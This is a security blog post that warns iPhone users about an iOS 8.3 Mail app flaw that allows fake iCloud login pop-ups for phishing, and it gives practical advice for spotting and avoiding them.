Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. That does not mean that Apple iOS is not susceptible to vulnerabilities and security gaps from time to time. Currently in iOS 8.3 there is an iPhone security flaw in the Mail app that doesn’t filter out malicious HTML code and could allow a potential hacker from tricking you in to providing your iCloud username and password quite easily. Basically it’s an iOS focused phishing flaw.
As of right now there are no known attacks or emails that are exploiting this, but that does not mean you should ignore it. This exploit is a pure social engineering attack and can be thwarted by a few settings on your phone but ultimately user awareness is your best weapon. How the flaw works is in an email loaded in the iOS Mail app a message can be sent that contains HTML code that will open a pop up window that will look very similar to the native iCloud login window. Since users are used to see that window for downloading apps and other phone functions the risk is they will blindly enter their username and password from pure habit. In reality is that your credentials will be sent to the hacker for their use to take over your account, get your credit card, access your photos, etc…
Here’s what the flaw looks like –
Here’s how you can protect yourself until Apple released an update.
- First, to be 100% protected from this, enable two-step authentication on your phone. There are a number of resources on how to do this and it’s very simple to go through the steps. Two step authentication will change the way your login works and if you see anything different than that you will know it’s fake.
- Remember that your iCloud login will NEVER open from an email message and Apple will NEVER, EVER ask your for credentials in an email. No company will. This is the main rule of spotting a phishing email. If you are hesitant NEVER launch it from the message. Close your mail, open a browser and go to the website yourself, NEVER from a provided link.
- If you are concerned, hit the Home button on your phone. If the login box is fake it will disappear, a real iOS login will stay open if you hit the HOME.
- Take a step back and ask yourself why am I being asked for my credentials, what am I doing that would require it? You will be asked for credentials for app installs, deep setting changes from the Settings section (not mail) and for most users that’s about it. Outside of that be wary.
- Ask someone that knows first, why did I get this? In Security if you don’t know, stop and ask. A few extra minutes to be sure is far better than a year or more of dealing with identity theft and fraud.
The digital world is a scary dangerous place full of people trying to steal your information and data for profit. Be aware and stay educated.
End of line.
Binary Blogger has spent 20 years in the Information Security space currently providing security solutions and evangelism to clients. From early web application programming, system administration, senior management to enterprise consulting I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day.